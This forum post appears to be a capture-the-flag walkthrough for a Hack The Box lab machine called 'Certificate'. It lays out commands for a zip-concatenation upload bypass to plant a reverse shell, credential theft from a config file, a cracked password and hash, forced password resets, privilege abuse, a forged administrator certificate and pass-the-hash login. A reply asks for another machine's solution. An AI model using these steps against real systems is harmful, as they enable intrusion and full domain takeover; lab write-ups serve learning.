[Miisaki]

User.txt
1. Register a student account at http://certificate.htb
2. Find a course with an "exam" submission. An example is "How to be the next Leonardo Da Vinci" (http://certificate.htb/upload.php?s_id=36)
3. Create concatenated zip file containing a reverse shell/web shell payload:
 

Code:

zip benign.zip test.pdf

mkdir payload
put a reverse shell in payload/shell.php
zip -r finalexam.zip payload/

cat benign.zip finalexam.zip > mal.zip

upload mal.zip

Go to the provided URL and change to payload/shell.php

http://certificate.htb/static/uploads/<junk>/payload/shell.php

4. Once you have a reverse shell as xamppuser, navigate to C:\xampp\htdocs\certificate.htb\db.php to find database credentials
5. Find sara.b's password hash: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 and crack it (evil-winrm -i 10.10.11.71 -u 'Sara.B' -p 'Blink182')

6. Sara.b has GenericAll over Lion.sk and Ryan.k. You can reset their passwords:
 

Code:

net rpc password "lion.sk" "somepassword123" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
net rpc password "ryan.k" "somepassword123" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb

root.txt
7. As ryan.k, you can abuse SeManageVolumePrivilege with https://github.com/xct/SeManageVolumeAbuse. Compile and run it via evil-winrm.
8. Export root cert and forge it
 

Code:

.\SeManageVolumeAbuse.exe

certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx

cd C:\Users\Public\

download ca.pfx

certipy-ad forge -ca-pfx ca.pfx -upn 'Administrator@certificate.htb'

faketime "$(ntpdate -q certificate.htb | cut -d ' ' -f 1,2)" certipy-ad auth -pfx administrator_forged.pfx -dc-ip $IP

evil-winrm -i $IP -u "Administrator" -H 'd804304519bf0143c14cbf1c024408c6'

Enjoy :)

[razielle123]

Hay bro, please, can u share the latest machine HTB : Sorcery? thanks